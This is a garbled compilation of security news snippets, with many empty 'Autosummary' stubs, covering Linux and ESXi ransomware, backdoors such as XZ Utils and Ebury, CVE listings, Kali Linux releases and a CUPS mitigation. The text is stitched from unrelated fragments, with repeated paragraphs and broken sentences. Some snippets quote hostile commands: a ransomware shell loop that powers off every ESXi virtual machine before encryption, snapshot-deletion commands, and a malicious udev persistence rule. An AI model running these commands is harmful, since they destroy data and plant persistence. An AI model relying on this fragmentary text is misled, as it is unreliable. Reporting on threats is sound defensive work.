No patches, but mitigation measures are available While patches are still in development, Red Hat shared mitigation measures requiring admins to stop the cups-browsed service from running and prevent it from being started on reboot using the following commands to break the exploit chain: sudo systemctl stop cups-browsed sudo systemctl disable cups-browsed Red Hat users can also use the following command to find out if cups-browsed is running on their systems: sudo systemctl status cups-browsed If the result displays "Active: inactive (dead)," then the exploit chain is halted, and the system is not vulnerable. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Hadooken hitting hard Once the attackers breach an environment and get sufficient privileges, they download a shell script named "c" and a Python script named "y." The two scripts both drop Hadooken, but the shell code also tries to look for SSH data in various directories and uses the info to attack known servers, the researchers say. "Autosummary:
New Linux malware called Hadooken targets Oracle WebLogic servers Pierluigi Paganini September 13, 2024 September 13, 2024 A new Linux malware called Hadooken targets Oracle WebLogic servers, it has been linked to several ransomware families. "Kali Linux 2024.3 is now available for download. Besides the new tools, this release mainly focuses on behind-the-scenes updates and optimization. New tools in Kali Linux 2024.3 This Kali release is about new tools and package updates: goshs – Think SimpleHTTPServer, but written in Go, and with more features graudit – Grep Rough AUDIT: source code auditing tool gsocket – Allows two machines on different networks to communicate with each other hekatomb – Extract and … More
The post Kali Linux 2024.3 released: 11 new tools, Qualcomm Snapdragon SDM845 SoC support appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Below are the descriptions for these vulnerabilities: CVE-2016-3714 ImageMagick Improper Input Validation Vulnerability CVE-2017-1000253 Linux Kernel PIE Stack Buffer Corruption Vulnerability CVE-2024-40766 SonicWall SonicOS Improper Access Control Vulnerability CVE-2016-3714 flaw (aka ImageTragick), in the popular image manipulation software ImageMagick could allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka “ImageTragick.” "Red Hat Enterprise Linux (RHEL) AI is Red Hat’s foundation model platform, enabling users to develop, test, and run GenAI models to power enterprise applications. The platform brings together the open source-licensed Granite LLM family and InstructLab model alignment tools based on the Large-scale Alignment for chatBots (LAB) methodology, packaged as an optimized, bootable RHEL image for individual server deployments across the hybrid cloud. While GenAI’s promise is immense, the associated costs of procuring, training, … More
The post Red Hat Enterprise Linux AI extends innovation across the hybrid cloud appeared first on Help Net Security.
"Autosummary:
While GenAI’s promise is immense, the associated costs of procuring, training, and fine-tuning LLMs can be astronomical, with some leading models costing nearly $200 million to train before launch. "Autosummary:
"Autosummary:
It should be noted that BlackCat/ALPHV encryptors also used random seven-character extensions and a ransom note named "RECOVER-[extension]-FILES.txt." Cicada3301 ransom note Source: BleepingComputer The ransomware"s operators can set a sleep parameter to delay the encryptor"s execution, potentially to evade immediate detection. Cicada3301 ransomware operator seeking affiliates on RAMP forums Source: Truesec Like other ransomware operations, Cicada3301 conducts double-extortion tactics where they breach corporate networks, steal data, and then encrypt devices. "Autosummary:
It should be noted that BlackCat/ALPHV encryptors also used random seven-character extensions and a ransom note named "RECOVER-[extension]-FILES.txt." Cicada3301 ransom note Source: BleepingComputer The ransomware"s operators can set a sleep parameter to delay the encryptor"s execution, potentially to evade immediate detection. Cicada3301 ransomware operator seeking affiliates on RAMP forums Source: Truesec Like other ransomware operations, Cicada3301 conducts double-extortion tactics where they breach corporate networks, steal data, and then encrypt devices. "Autosummary:
Linux malware sedexp uses udev rules for persistence and evasion Pierluigi Paganini August 26, 2024 August 26, 2024 Researchers spotted a new stealthy Linux malware named sedexp that uses Linux udev rules to achieve persistence and evade detection. "Autosummary:
" The udev rule for sedexp -- ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="asedexpb run:+" -- is set up such that the malware is run whenever /dev/random (corresponds to device minor number 8) is loaded, which typically occurs upon every reboot. "Autosummary:
Udev rules are text configuration files that dictate how the manager should handle certain devices or events, located in "/etc/udev/rules.d/" or "/lib/udev/rules.d/." These rules contain three parameters that specify its applicability (ACTION== "add"), the device name (KERNEL== "sdb1"), and what script to run when the specified conditions are met (RUN+="/path/to/script"). "Autosummary:
" Linux boot broken after Windows security update (Ok_Work_5257) For those who have already installed the August 2024 Windows updates and can no longer boot Linux on their dual-boot devices, Microsoft recommends deleting the SBAT update and ensuring that future SBAT updates will no longer be installed. "Autosummary:
"Autosummary:
The list of affected models is very long, it includes IPC-X3XXX,HX5XXX, HUM7XX, VTO75X95X, VTO65XXX, VTH542XH, PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, SD6AL, Thermal TPC-BF1241, TPC-BF2221, TPC-SD2221, TPC-BF5XXX, TPC-SD8X21, TPC-PT8X21B, NVR1XXX, NVR2XXX, NVR4XXX, NVR5XXX, NVR6XX. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Android Security Bulletin for August 2024 addressed a total of 47 vulnerabilities in Framework (13), System (1), Kernel (1), Arm components (2), Imagination Technologies (1), MediaTek components (1), Qualcomm components (21), and Qualcomm closed-source components (7). "Autosummary:
Earlier this year, Google patched another zero-day exploited in attacks: a high-severity elevation of privilege (EoP) flaw in the Pixel firmware, tracked as CVE-2024-32896 by Google and CVE-2024-29748 by GrapheneOS (which found and reported the flaw). "Autosummary:
SLUBStick exploits a heap vulnerability, such as a double-free, user-after-free, or out-of-bounds write, to manipulate the memory allocation process. "Autosummary:
"Autosummary:
Manufacturing, professional services, construction, IT, retail, financial services, transportation, media, legal services, and real estate are some of the top industries affected by the Play ransomware during the time period. "Autosummary:
To power off all running VMware ESXi virtual machines so that they can be encrypted, Trend Micro says the encryptor will execute the following code: /bin/sh -c "for vmid in $(vim-cmd vmsvc/getallvms | grep -v Vmid | awk "{print $1}"); do vim-cmd vmsvc/power.off $vmid; done" As BleepingComputer found while analyzing it, this variant is designed to specifically target VMFS (Virtual Machine File System), which is used by VMware"s vSphere server virtualization suite. "Autosummary:
"Autosummary:
"Not only that, they have developed a kernel component with a large set of techniques to manipulate processes, but they also went through the requirements imposed by Microsoft to obtain a code-signing certificate for their driver component." "Autosummary:
Eldorado is the latest in the list of new double-extortion ransomware players that have sprung up in recent times, including Arcus Media, AzzaSec, dan0n, Limpopo (aka SOCOTRA, FORMOSA, SEXi), LukaLocker, Shinra, and Space Bears once again highlighting the enduring and persistent nature of the threat. "Autosummary:
"This vulnerability, if exploited, could lead to full system compromise where an attacker can execute arbitrary code with the highest privileges, resulting in a complete system takeover, installation of malware, data manipulation, and the creation of backdoors for persistent access. "Autosummary:
"The vulnerability, which is a signal handler race condition in OpenSSH"s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems," Bharat Jogi, senior director of the threat research unit at Qualys, said in a disclosure published today. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2022-24816 GeoSolutionsGroup JAI-EXT Code Injection Vulnerability CVE-2022-2586 Linux Kernel Use-After-Free Vulnerability CVE-2020-13965 Roundcube Webmail Cross-Site Scripting (XSS) Vulnerability Below are the descriptions of the flaws added to the KEV catalog: GeoServer Flaw CVE-2022-24816 (CVSS score of 9.8) is a code injection issue in the Jai-Ext open source project. "Autosummary:
Experts found a bug in the Linux version of RansomHub ransomware Pierluigi Paganini June 22, 2024 June 22, 2024 The RansomHub ransomware operators added a Linux encryptor to their arsenal, the version targets VMware ESXi environments. "Autosummary:
Includes "VirtualShine" (bash shell access through VMCI sockets), "VirtualPie" (file transfer, command execution, reverse shell), and "VirtualSphere" (controller transmitting the commands). The most recent attacks by UNC3886, according to Mandiant, targeted organizations in North America, Southeast Asia, and Oceania, with additional victims identified in Europe, Africa, and other parts of Asia. "Autosummary:
Configuration options and commands Source: Recorded Future It also features ESXi-specific commands and options, like "vim-cmd vmsvc/getallvms" and "vim-cmd vmsvc/snapshot.removeall" for snapshot deletion, and "esxcli vm process kill" for shutting down VMs. "SUSE announced a new SUSE Liberty Linux offering to help protect CentOS systems from future vulnerabilities. SUSE Liberty Linux Lite for CentOS 7 is a frictionless solution that provides customers with updates and security patches for their existing CentOS system, with no migration whatsoever. This gives customers the security and certainty of uninterrupted, SUSE enterprise Linux support, without the hassle and disruption of switching OS on-premises or in the cloud. “Open source technologies are the … More
The post SUSE announces Liberty Linux Lite for CentOS 7 appeared first on Help Net Security.
"Autosummary:
“Open source technologies are the cornerstone of innovation for enterprises, fostering collaboration, agility, and cost-effectiveness,” said Rick Spencer, GM of Business Critical Linux, SUSE. "Autosummary:
TIKTAG-v2 code Source: arxiv.org If the tags match, the value is forwarded, and the load succeeds, influencing the cache state, while in the case of a mismatch, the forwarding is blocked, and the cache state remains unchanged. "Autosummary:
When DISGOMOJI is launched, the malware will exfiltrate system information from the machine, including IP address, username, hostname, operating system, and the current working directory, which is sent back to the attackers. "Autosummary:
It"s equipped to launch a reverse shell, download/upload files, schedule execution, and initiate SOCKS tunneling, with the attacks leveraging known security flaws in public-facing applications to breach Linux servers and drop a web shell for remote access and malware delivery. "Autosummary:
CVE-2024-4610 ARM Mali GPU Kernel Driver Use-After-Free Vulnerability CVE-2024-4577 PHP-CGI OS Command Injection Vulnerability The vulnerability CVE-2024-4610 is a use-after-free issue issue that impacts Bifrost GPU Kernel Driver (all versions from r34p0 to r40p0) and Valhall GPU Kernel Driver (all versions from r34p0 to r40p0). "Autosummary:
Bifrost-based Mali GPUs are used in smartphones/tables (G31, G51, G52, G71, and G76), single-board computers, Chromebooks, and various embedded systems. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: High-risk Atlassian Confluence RCE fixed, PoC available (CVE-2024-21683) If you’re self-hosting an Atlassian Confluence Server or Data Center installation, you should upgrade to the latest available version to fix a high-severity RCE flaw (CVE-2024-21683) for which a PoC and technical details are already public. Kali Linux 2024.2 released: 18 new tools, countless updates Kali Linux 2024.2 is now available. It … More
The post Week in review: Atlassian Confluence RCE PoC, new Kali Linux, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: May 2024 Here’s a look at the most interesting products from the past month, featuring releases from: Abnormal Security, Adaptive Shield, Appdome, AuditBoard, Calix, Cranium, CyberArk, Cybersixgill, Dashlane, Datadog, Detectify, Eclypsium, ExtraHop, FireMon, Forcepoint, ManageEngine, OneTrust, OWASP Foundation, PlexTrac, Proofpoint, Secure Code Warrior, SentinelOne, Snyk, Splunk, Strike Graph, Sumo Logic, Synopsys, Trellix, and Truecaller. New infosec products of the week: June 7, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Appdome, SailPoint, Tines, Trend Micro, Verimatrix, and Zyxel Networks. "Autosummary:
A new Linux version of TargetCompany ransomware targets VMware ESXi environments Pierluigi Paganini June 06, 2024 June 06, 2024 A new Linux variant of the TargetCompany ransomware family targets VMware ESXi environments using a custom shell script. "Autosummary:
Kali 2024.2 doesn"t disappoint, with eighteen new tools added in this release: autorecon - Multi-threaded network reconnaissance tool coercer - Automatically coerce a Windows server to authenticate on an arbitrary machine dploot - Python rewrite of SharpDPAPI getsploit - Command line utility for searching and downloading exploits gowitness - Web screenshot utility using Chrome Headless horst - Highly Optimized Radio Scanning Tool ligolo-ng - Advanced, yet simple, tunneling/pivoting tool that uses a TUN interface mitm6 - pwning IPv4 via IPv6 netexec - Network service exploitation tool that helps automate assessing the security of large networks. "Kali Linux 2024.2 is now available. It includes future package compatibility for 32-bit platforms, improvements to GNOME 46 and Xfce, and 18 new tools. Desktop changes Kali 2024.2 introduces GNOME 46, offering a refined experience that builds on the enhancements from previous versions. The Xfce desktop has undergone specific changes for Kali-Undercover and HiDPI modes. These updates improve stability and include several minor bug fixes, ensuring better support for the latest desktop features. New tools … More
The post Kali Linux 2024.2 released: 18 new tools, countless updates appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Also known as Mallox, FARGO, and Tohnichi, the TargetCompany ransomware operation emerged in June 2021 and has been focusing on database attacks (MySQL, Oracle, SQL Server) against organizations mostly in Taiwan, South Korea, Thailand, and India. "NethSecurity is a free, open-source Linux firewall that simplifies network security deployment. It integrates various security features into one platform, including firewalling, intrusion detection and prevention, antivirus, multi-WAN, DNS, and content filtering. NethSecurity has an intuitive interface that delivers real-time insights and control over network security. It is a centralized hub for monitoring and managing firewall activities, presenting essential information such as intrusion attempts, traffic patterns, and system health. Fully featured Linux firewall Some of … More
The post NethSecurity: Open-source Linux firewall appeared first on Help Net Security.
"Autosummary:
Future plans and download Version 8.0 was released recently, but the developers plan to release another major update in the coming months, which is set to include: Firewall Objects Reporting Conntrack UI Admin User Management from the UI NethSecurity is available for free on here. "Autosummary:
Kaspersky has tested the tool on popular Linux distributions and confirmed it works on Red Hat Enterprise Linux, CentOS, Linux Mint, Ubuntu, SUSE, openSUSE, and Debian, among others. "Autosummary:
The fix has been backported to multiple stable kernel versions as listed below: v5.4.269 and later v5.10.210 and later v6.6.15 and later v4.19.307 and later v6.1.76 and later v5.15.149 and later v6.7.3 and later In late March 2024, a security researcher using the alias "Notselwyn" published a detailed write-up and proof-of-concept (PoC) exploit on GitHub, showcasing how to achieve local privilege escalation by exploiting the flaw on Linux kernel versions between 5.14 and 6.6. "Autosummary:
"Autosummary:
"Autosummary:
08 Collects statistics about an arbitrary directory tree and reports: total number of subdirectories, total number of files, total size of files 09 Reports the configuration details of the affected computer: hostname, username, CPU, RAM, network interfaces, listing each interface name, MAC, IP, and IPv6 address 10 Configures a fallback shell to use when executing the shell command in operation 02. The WIZVERA VeraPort integration installation program is used to manage additional security software (e.g., browser plug-ins, security software, identity verification software, etc.) Kimsuky cyberespionage group (aka Springtail, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, APT43) was first spotted by Kaspersky researcher in 2013.North Korea-linked Kimsuky used a new Linux backdoor in recent attacks Pierluigi Paganini May 19, 2024 May 19, 2024 Symantec warns of a new Linux backdoor used by the North Korea-linked Kimsuky APT in a recent campaign against organizations in South Korea. "Autosummary:
"ESET researchers released its deep-dive investigation into one of the most advanced server-side malware campaigns. It is still growing and has seen hundreds of thousands of compromised servers in its at least 15-year-long operation. The Ebury group and botnet have been involved in the spread of spam, web traffic redirections, and credential stealing over the years. In recent years, they have diversified to credit card and cryptocurrency theft. Additionally, Ebury has been deployed as a … More
The post Ebury botnet compromises 400,000+ Linux servers appeared first on Help Net Security.
"Autosummary:
Victims include universities, small and large enterprises, internet service providers, cryptocurrency traders, Tor exit nodes, shared hosting providers, and dedicated server providers, to name a few.It is used to deploy additional malware to monetize the botnet (such as modules for web traffic redirection), proxy traffic for spam, perform adversary-in-the-middle attacks (AitM), and host supporting malicious infrastructure. "Autosummary:
In early February 2024, researchers at the SW2 threat intelligence company reported about a campaign where Kimsuky used trojanized versions of various software solutions, e.g. TrustPKI and NX_PRNMAN from SGA Solutions, Wizvera VeraPort, to infect South Korean targets with Troll Stealer and the Go-based Windows malware GoBear." Based on the analysis of the campaign, the researchers believe that supply-chain attacks (software, trojanized installers, fake installers) represent the preferred attack method for North Korean espionage actors. "Autosummary:
" ESET"s investigation has unearthed various methods the attackers use to deliver Ebury, including methods such as theft of SSH credentials, credential stuffing, infiltrating hosting provider infrastructure, exploitation of flaws in Control Web Panel (e.g., CVE-2021-45467), and SSH adversary-in-the-middle (AitM) attacks. "Autosummary:
The monetization strategies vary, though, and they also include stealing credit card information entered into payment sites, redirecting web traffic to generate revenue from ads and affiliate programs, using compromised servers to send spam, and selling the captured credentials. The malware modules spread via the Ebury botnet, based on ESET"s latest observations, are: HelimodProxy : Proxies raw traffic and relays spam by modifying the mod_dir.so Apache module, allowing the compromised server to run arbitrary commands and support spam campaigns. "Autosummary:
One of the most advanced server-side malware campaigns is still growing, with hundreds of thousands of compromised servers, and it has diversified to include credit card and cryptocurrency theft Ten years ago we raised awareness of Ebury by publishing a white paper we called Operation Windigo, which documented a campaign that leveraged Linux malware for financial gain. The new paper, Ebury is alive but unseen: 400k Linux servers compromised for cryptocurrency theft and financial gain, goes into more details about each of Ebury’s aspects, including many technical specifics. "As organizations increasingly adopt AI, they face unique challenges in updating AI models to keep pace with evolving threats while ensuring seamless integration into existing cybersecurity frameworks. In this Help Net Security interview, Pukar Hamal, CEO at SecurityPal, discusses the integration of AI tools in cybersecurity. What are organizations’ main challenges when integrating AI into their cybersecurity infrastructures? Companies are like organisms: constantly changing every second. Given the dynamic nature of companies, keeping AI models … More
The post Strategies for preventing AI misuse in cybersecurity appeared first on Help Net Security.
"Autosummary:
Employing a layered security approach, including encryption, behavior monitoring, and automatic alerts for unusual activities, helps strengthen defenses. In this Help Net Security interview, Pukar Hamal, CEO at SecurityPal, discusses the integration of AI tools in cybersecurity. "Autosummary:
"Autosummary:
"Away from the complex infrastructure of modern ransomware, junk-gun ransomware allows criminals to get in on the action cheaply, easily, and independently," Sophos said, describing it as a "relatively new phenomenon" that further lowers the cost of entry. "Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia," cybersecurity agencies from the Netherlands and the U.S., along with Europol"s European Cybercrime Centre (EC3), said in a joint alert. "Autosummary:
The development comes amid the emergence of new ransomware families like Evil Ant, HelloFire, L00KUPRU (an Xorist ransomware variant), Muliaka (based on the leaked Conti ransomware code), Napoli (a Chaos ransomware variant), Red CryptoApp, Risen, and SEXi (based on the leaked Babuk ransomware code) that have been spotted targeting Windows and VMware ESXi servers. "Autosummary:
The agttydck malware, written in C++ and packed with UPX, performs several malicious actions: it logs activity in “/tmp/log.0” at startup and “/tmp/log.1” at completion, searches the root directory for encryptable directories, drops a ransom note in each directory, and encrypts all files, appending a “.L0CK3D” extension.Linux variant of Cerber ransomware targets Atlassian servers Pierluigi Paganini April 17, 2024 April 17, 2024 Threat actors are exploiting the CVE-2023-22518 flaw in Atlassian servers to deploy a Linux variant of Cerber (aka C3RB3R) ransomware. "Autosummary:
"Autosummary:
The attacks, codenamed Heckler and WeSee, make use of malicious interrupts to break the integrity of CVMs, potentially allowing threat actors to remotely log in and gain elevated access, as well as perform arbitrary read, write, and code injection to disable firewall rules and open a root shell. "Autosummary:
Two attack methods are Branch Target Injection (BTI), which involves manipulating the CPU"s branch prediction to execute unauthorized code paths, and Branch History Injection (BHI), which manipulates branch history to cause speculative execution of chosen gadgets (code paths), leading to data leakage. As the CERT Coordination Center (CERT/CC) disclosed yesterday, the new flaw, tracked as CVE-2024-2201, allows unauthenticated attackers to read arbitrary memory data by leveraging speculative execution, bypassing present security mechanisms designed to isolate privilege levels. "Autosummary:
"Autosummary:
"It modifies ifunc calls to replace a check "is_arch_extension_supported" which should simply invoke "cpuid" to insert a call to "_get_cpuid" which is exported by the payload object file (i.e., liblzma_la-crc64-fast.o) and which calls malformed _get_cpuid() which is implanted into the code shown in the figure below. "Autosummary:
"The most notable part of this supply chain attack is the extreme levels of dedication of the attacker, working more than two years to establish themselves as a legitimate maintainer, offering to pick up work in various OSS projects and committing code across multiple projects in order to avoid detection," JFrog said. "Autosummary:
The malware"s execution logic (Kaspersky) The infected machine is tagged using infection, hardware, and system details and the report is sent to the command and control (C2) server to manage victim hosts. "The news that XZ Utils, a compression utility present in most Linux distributions, has been backdoored by a supposedly trusted maintainer has rattled the open-source software community on Friday, mere hours until the beginning of a long weekend for many. Nearly two days have passed since then. What do we currently know about the entire affair? The discovery The backdoor was discovered by Andres Freund, a software engineer at Microsoft, when testing some things on … More
The post XZ Utils backdoor update: Which Linux distros are affected and what can you do? appeared first on Help Net Security.
"Autosummary:
XZ Utils was authored by and is still led by Lasse Collin, but the backdoor was introduced by someone that went by “Jia Tan” (JiaT75 on GitHub), who became – over several years, with the help of sock puppet accounts and trust-building via social engineering – a prolific maintainer of the software, and did other things to keep the existence of the backdoor under wraps. Debian maintainers announced that “no Debian stable versions are known to be affected”, but that compromised packages were part of the Debian testing, unstable and experimental distributions, and users of those “are urged to update the xz-utils packages.” "Autosummary:
DinodasRAT Linux variant targets users worldwide Pierluigi Paganini March 31, 2024 March 31, 2024 A Linux variant of the DinodasRAT backdoor used in attacks against users in China, Taiwan, Turkey, and Uzbekistan, researchers from Kaspersky warn. Researchers from Kaspersky uncovered a Linux version of a multi-platform backdoor DinodasRAT that was employed in attacks targeting China, Taiwan, Turkey, and Uzbekistan.Instead, hardware-specific information is collected and used to generate a UID, demonstrating that DinodasRAT’s primary use case is to gain and maintain access via Linux servers rather than reconnaissance.” concludes the report.The UID typically includes the date of infection, MD5 hash of the dmidecode command output (a detailed report of the infected system’s hardware), randomly generated number as ID, and backdoor version. "Autosummary:
"Autosummary:
Compromised packages were part of the Debian testing, unstable and experimental distributions, with versions ranging from 5.5.1alpha-0.1 (uploaded on 2024-02-01), up to and including 5.6.1-1.” reads th advisory. "Autosummary:
"wall displays a message, or the contents of a file, or otherwise its standard input, on the terminals of all currently logged in users," the man page for the Linux command reads. "Autosummary:
" Red Hat reverts to XZ 5.4.x in Fedora Beta Red Hat is now tracking this supply chain security issue as CVE-2024-3094, assigned it a 10/10 critical severity score, and reverted to 5.4.x versions of XZ in Fedora 40 beta. "A vulnerability (CVE-2024-3094) in XZ Utils, the XZ format compression utilities included in most Linux distributions, may “enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely,” Red Hat warns. The cause of the vulnerability is actually malicious code present in versions 5.6.0 (released in late February) and 5.6.1 (released on March 9) of the xz libraries, which was accidentally found by Andres Freund, a PostgreSQL developer and … More
The post Beware! Backdoor found in XZ utilities used by many Linux distros (CVE-2024-3094) appeared first on Help Net Security.
"Autosummary:
Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the “fixes” [for errors caused by the injected code in v5.6.0],” Freund commented “Luckily xz 5.6.0 and 5.6.1 have not yet widely been integrated by Linux distributions, and where they have, mostly in pre-release versions.” "Autosummary:
"Autosummary:
"Since we can send escape sequences through wall, if a user is using a terminal that supports this escape sequence, an attacker can change the victims clipboard to arbitrary text," Ferrante details. "Autosummary:
During last year"s Vancouver Pwn2Own, won by Team Synacktiv, hackers earned $1,035,000 and a Tesla car for 27 zero-days (and several bug collisions) in Windows 11, Microsoft Teams, Microsoft SharePoint, macOS, Ubuntu Desktop, VMware Workstation, Oracle VirtualBox, and Tesla"s Model 3. "Autosummary:
" Code execution is needed because global themes are designed to change everything on a Plasma desktop, from icons to windows decorations, lock screens, splash screens, wallpapers, color schemes, and so on, using executable bash scripts.On Wednesday, the KDE team warned Linux users to exercise "extreme caution" when installing global themes, even from the official KDE Store, because these themes run arbitrary code on devices to customize the desktop"s appearance. "SUSE announced enhancements across its cloud native and Edge portfolio to enable customers to securely deploy and manage business-critical workloads anywhere. New capabilities in Rancher Prime 3.0, SUSE’s commercial offering of Rancher and SUSE Edge 3.0 commit to enabling choice and providing secure platforms through 100 percent open source solutions. “At SUSE, our commercial and open source users are equally important,” said Peter Smails, GM of the SUSE Enterprise Container Management business unit. “As such, … More
The post SUSE announces new enhancements to help users manage business-critical workloads appeared first on Help Net Security.
"Autosummary:
SUSE is also introducing Rancher Enterprise, a single package and price for the entire portfolio of Rancher Prime including multi-cluster management, OS management, VM management, persistent storage, and SUSE’s certified Linux OS, SUSE Linux Enterprise Micro. Security and lifecycle management, enabling self-service PaaS with Rancher Prime New capabilities in Rancher Prime 3.0 help platform engineering teams deliver self-service Platform-as-a-Service (PaaS) to their developer communities, and enhanced support for AI workloads. "Autosummary:
"Autosummary:
Code comparison showing functional similarities (@juanandres_gs) AcidPour shares input/output control (IOCTL)-based wiping logic with VPNFilter"s "dstr" plugin and AcidRain, indicating a continuation or adaptation of the previously documented malicious techniques. "Autosummary:
— J. A. Guerrero-Saade (@juanandres_gs) March 18, 2024 Some code entries such as ‘/dev/ubiXX’ (refers to Unsorted Block Images (UBI)) and ‘/dev/dm-XX’ suggest the malware can target systems utilizing flash memory like IoT devices, networking devices, and possibly some ICS devices along with virtual block devices associated with LVM. AcidPour uses a similar IOCTL based wiping logic as VPNFilter "dstr" plugin and AcidRain pic.twitter.com/hzVytibRba — J. A. Guerrero-Saade (@juanandres_gs) March 18, 2024 Analogous to AcidRain, there appears to be a different wiping logic for borking certain devices like /dev/dmXX (LVMs, likely RAIDs). "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Transitioning to memory-safe languages: Challenges and considerations In this Help Net Security interview, Omkhar Arasaratnam, General Manager at the Open Source Security Foundation (OpenSSF), discusses the evolution of memory-safe programming languages and their emergence in response to the limitations of languages like C and C++. LastPass’ CIO vision for driving business strategy, innovation Recently, LastPass appointed Asad Siddiqui as its … More
The post Week in review: Cybersecurity job openings, hackers use 1-day flaws to drop custom Linux malware appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Transitioning to memory-safe languages: Challenges and considerations In this Help Net Security interview, Omkhar Arasaratnam, General Manager at the Open Source Security Foundation (OpenSSF), discusses the evolution of memory-safe programming languages and their emergence in response to the limitations of languages like C and C++. Keyloggers, spyware, and stealers dominate SMB malware detections In 2023, 50% of malware detections for SMBs were keyloggers, spyware and stealers, malware that attackers use to steal data and credentials, according to Sophos. "A financially motivated threat actor is using known vulnerabilities to target public-facing services and deliver custom malware to unpatched Windows and Linux systems. Among the exploited vulnerabilities are also two recently discovered Ivanti Connect Secure VPN flaws that are widely exploited by a variety of attackers. Magnet Goblin activity Magnet Goblin – as the threat actor has been dubbed by Check Point researchers – has been targeting unpatched edge devices and public-facing servers for years. … More
The post Hackers leverage 1-day vulnerabilities to deliver custom Linux malware appeared first on Help Net Security.
"Autosummary:
"Autosummary:
These include: Magento – CVE-2022-24086 – CVE-2022-24086 Qlik Sense – CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 – CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 Ivanti Connect Secure – CVE-2023-46805 and CVE-2024-21887, CVE-2024-21888 and CVE-2024-21893. The researchers also observed a simplified version of the NerbianRAT, called MiniNerbian, which supports the following actions: Execute C2’s command and return results Update activity schedule (full day or specific hours) Update configuration Unlike NerbianRAT, MiniNerbian uses HTTP protocol for C2 communication. "Autosummary:
Configuration parameters Source: Check Point The C2 may send one of the following actions to the malware for execution at the infected system: Request more actions Execute a Linux command in a new thread Send command result and clean the file; stop any running commands Execute a Linux command immediately Do nothing Modify connection interval Adjust and save worktime settings Return idle timings, config, or command results Update a specific config variable Refresh command buffer for C2 execution commands The MiniNerbian is a simplified version of the NerbianRAT, which is primarily used for command execution and supports the following actions: Execute C2"s command and return results Update activity schedule (full day or specific hours) Update configuration MiniNerbian communicates with the C2 via HTTP, differentiating it from the more complex NerbianRAT, which uses raw TCP sockets for communication. "Autosummary:
Linux Malware targets misconfigured misconfigured Apache Hadoop, Confluence, Docker, and Redis servers Pierluigi Paganini March 07, 2024 March 07, 2024 A new Linux malware campaign campaign is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances. "Autosummary:
At the end of February, Avast researchers observed the North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver. "Autosummary:
New Linux variant of BIFROSE RAT uses deceptive domain strategies Pierluigi Paganini March 04, 2024 March 04, 2024 A new Linux variant of the remote access trojan (RAT) BIFROSE (aka Bifrost) uses a deceptive domain mimicking VMware. "Autosummary:
GTPDOOR v1 supports the following operations on breached hosts: Set a new encryption key used for C2 communications Write arbitrary data to a local file named "system.conf" Execute arbitrary shell commands and send back the output GTPDOOR v2 supports the above operations plus the following: Specify IP addresses or subnets allowed to communicate with the compromised host through an Access Control List (ACL) mechanism. "Autosummary:
With kernel-level access, an attacker might disrupt security software, conceal indicators of infection (including files, network activity, processes, etc.), disable kernel-mode telemetry, turn off mitigations, and more," Avast explained. "Autosummary:
The malware has been put to use by a state-backed hacking group from China tracked as BlackTech (aka Circuit Panda, HUAPI, Manga Taurus, Palmerworm, PLEAD, Red Djinn, and Temp. "Autosummary:
Lazarus APT exploited zero-day in Windows driver to gain kernel privileges Pierluigi Paganini February 29, 2024 February 29, 2024 North Korea-linked Lazarus APT exploited a zero-day flaw in the Windows AppLocker driver (appid.sys) to gain kernel-level access to target systems. "OffSec has released Kali Linux 2024.1, the latest version of its popular penetration testing and digital forensics platform. The new version comes with new tools, a fresh look (themes, wallpapers and icons for Kali and Kali Purple), a new image viewer for the Gnome desktop and a usability enhancement to the Xfce desktop (the ability to copy one’s VPN IP address to the clipboard with just a click), and updates for the Kali NetHunter mobile … More
The post Kali Linux 2024.1 released: New tools, new look, new Kali Nethunter kernels appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
" Cybersecurity vendor Avast, which discovered an in-the-wild admin-to-kernel exploit for the bug, said the kernel read/write primitive achieved by weaponizing the flaw allowed the Lazarus Group to "perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit. "Autosummary:
"Autosummary:
Below are the four new tools added in Kali 2024.1: blue-hydra - Bluetooth device discovery service opentaxii - TAXII server implementation from EclecticIQ readpe - Command-line tools to manipulate Windows PE files snort - Flexible Network Intrusion Detection System In addition to the new tools, Kali says they upgraded the Kernel version to 6.6. "Autosummary:
Direct syscalls used in the exploit (Avast) The FudModule rootkit, built within the same module as the exploit, executes direct kernel object manipulation (DKOM) operations to turn off security products, hide malicious activities, and maintain persistence on the breached system. "The Federal Trade Commission will require software provider Avast to pay $16.5 million and prohibit the company from selling or licensing any web browsing data for advertising purposes to settle charges that the company and its subsidiaries sold such information to third parties after promising that its products would protect consumers from online tracking. In its complaint, the FTC says that Avast, based in the United Kingdom, through its Czech subsidiary, unfairly collected consumers’ browsing … More
The post Avast ordered to pay $16.5 million for misuse of user data appeared first on Help Net Security.
"Autosummary:
For example, as alleged in the complaint, Jumpshot entered into a contract with Omnicom, an advertising conglomerate, which stated that Jumpshot would provide Omnicom with an “All Clicks Feed” for 50% of its customers in the United States, United Kingdom, Mexico, Australia, Canada, and Germany. "Autosummary:
